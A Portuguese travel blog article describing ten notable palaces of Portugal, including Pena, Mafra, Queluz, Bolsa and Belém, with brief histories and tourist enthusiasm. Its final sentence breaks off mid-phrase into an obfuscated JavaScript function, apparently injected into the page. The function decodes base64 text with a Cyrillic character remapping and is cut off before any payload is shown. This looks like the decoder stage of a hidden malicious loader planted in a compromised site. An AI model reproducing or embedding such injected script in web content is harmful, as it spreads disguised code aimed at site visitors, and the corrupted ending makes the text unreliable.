Não me canso de elogiar o nosso país. São tantas as suas maravilhas! Desta vez escolhi falar de alguns dos mais bonitos palácios de Portugal e digo-lhe já que não foi uma tarefa fácil. São todos lindíssimos. E a sua história faz-nos viajar no tempo e imaginar como seria divertido viver nas épocas de outrora como princesas ou príncipes.
Palácio da Pena, Sintra
Numa das montanhas mais altas de Sintra ergue-se este encantador palácio. O misticismo tão característico de Sintra aqui volta a sentir-se quando fazemos uma visita a esta obra incrível. Com traços e arquitetura manuelina e mourisca, D. Fernando I conseguiu através da sua criatividade dar vida ao expoente máximo do romantismo. De noite é possível ver este palácio iluminado no alto do parque da Pena, rodeado por mais de 500 espécies de árvores importadas de todos os cantos do Mundo.
Palácio de Mafra, Mafra
Este palácio, também frequentemente chamado de Convento de Mafra, tem uma dimensão fora do vulgar. Inicialmente foi construído para abrigar 13 frades franciscanos mas, com o passar do tempo e com o Rei D. João V a enriquecer ainda mais, a obra ganhou proporções impressionantes, abrigando ao todo mais de 300 frades. Monumento do estilo barroco, reza a lenda que foi para cumprir uma promessa que o rei o mandou edificar. A Rainha Dona Maria de Áustria não conseguia engravidar e o rei, com medo de não deixar herdeiros, apressou-se a fazer uma promessa aos seus santos. Aquando do nascimento da princesa Dona Maria Bárbara a promessa foi cumprida.
Palácio de Monserrate, Sintra
Tal como o nome indica este palácio está inserido no jardim de Monserrate e foi, em tempos, a residência de verão da família Cook. Dá para acreditar que alguém passava férias numa casa como esta?! Que sorte! Símbolo do romantismo português, este palácio chegou mesmo a ser visitado por poetas que dedicaram estrofes à sua sublime beleza. Como Lord Byron em "Childe Harold's Pilgrimage". Hoje em dia pertence ao Estado. É lindo, não acha?
Palácio da Bolsa, Porto
É mesmo no centro da cidade do Porto que encontra este encantador palácio. Hoje sala de encontros de altas patentes, concertos, palestras e assembleias gerais, foi mandado construir pela Associação Comercial do Porto, sobre as ruínas do Convento de S. Francisco. O seu interior é de cortar a respiração com traços do neoclássico e neopaladiano inglês. Para além do Pátio das Nações e do Salão Árabe, que são autenticas obras de arte, há para apreciar ainda as pinturas a óleo e os frescos dos grandes pintores portugueses, as esculturas e o mobiliário, entre tantas outras delícias para os olhos! Já o visitou? Então do que é que está à espera? 🙂
Palácio de Queluz, Sintra
Já se sabe que Sintra é cidade de castelos e palácios. Este é outro dos mais bonitos palácios de Portugal e mais uma vez podemos vê-lo no concelho de Sintra, mais precisamente em Queluz. Este belo palácio do séc. XVIII é uma das mais belas provas de que a paisagem ajardinada se funde na perfeição com a arquitetura palaciana. No seu interior, as paredes forradas de espelhos ou pinturas, os lustres reluzentes, demonstram o requinte que se respirava nesta casa. Na zona exterior, é obrigatório subir a escadaria dos leões que dá acesso ao Canal de Azulejos, um lago artificial enorme, decorado com grandes paineis de azulejos. Imagine-se a passear de gôndola por ali enquanto ouvia música, tal e qual como a Família Real costumava fazer!
Palácio de Estói, Faro
É uma obra de estilo rococó, única na região. Durou cerca de 20 anos a construir mas o resultado final é deveras impressionante. Tanto é que no dia em que foi concluído, foi dada uma festa grandiosa para celebrar. Sabia desta? É verdade! Hoje em dia o palácio está, como tantos outros, a ser convertido numa pousada. Os seus antigos pavilhões de chá, no edifício principal e os seus fantásticos jardins ao estilo Versailles vão poder ganhar agora outros inquilinos. E quem é que não vai querer passar aqui uma noite ou duas?!
Palácio da Ajuda, Lisboa
Também conhecido por Paço Nacional de Nossa Senhora da Ajuda, é hoje um Monumento Nacional Português.
Foi convertido em museu e, ao percorrer os seus corredores, consegue mesmo imaginar-se nos tempos dos reis e rainhas, já que cada detalhe foi meticulosamente trabalhado aquando da sua construção. No piso térreo encontra a Sala Azul, ricamente decorada. No piso nobre, a Sala dos Grandes Jantares, local onde ainda hoje se realizam luxuosos banquetes. Juntamente com o palácio também poderá visitar aqui a Biblioteca Nacional da Ajuda.
Palácio da Brejoeira, Viana do Castelo
Este palácio pertenceu a Hermínia Paes e foi-lhe oferecido pelo seu pai Francisco de Oliveira Paes, mas o mais interessante é que esta senhora habitou aqui até 2015, aquando da sua morte, numa ala reservada deste incrível e imponente palácio. Recentemente abriram-se as portas de sua casa, para poder partilhar com o mundo as memórias antigas e todo o espólio deslumbrante. Com o dinheiro das visitas, o palácio pode ser restaurado nas partes que já vão denotando os sinais do tempo.
Palácio dos Duques de Bragança, Guimarães
Provavelmente conhece este palácio por Paço dos Duques, que foi construído no séc. XV por D. Afonso I, duque de Bragança, o que lhe valeu o nome. Todo de estilo borgonhês e inspiração nas suas viagens pela Europa, no seu interior pode encontrar uma sala museu onde se podem admirar os tapetes persas, as tapeçarias flamengas e pinturas várias. Outro pormenor interessante é o facto de o tecto da sala de refeições representar o casco de uma caravela em homenagem aos heróis do mar portugueses.
Palácio de Belém, Lisboa
Um dos mais conhecidos palácios de Portugal, por servir de habitação ao nosso Presidente da República. Fica na Praça Afonso de Albuquerque, em Belém, e tem um lindo tom rosa. Já foi também palco de vários eventos com concertos ao vivo. Em 2004 foi também aqui inaugurado o Museu da Presidência da República, com uma exposição de peças de coleção ligadas aos políticos mais importantes do Estado português desde 1910.
Se gostou de conhecer os mais belos palácios de Portugal, conheça também estes 12 lugares santos de Portugal e os 8 mais belos miradouros do nosso país. Desvende ainda as function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa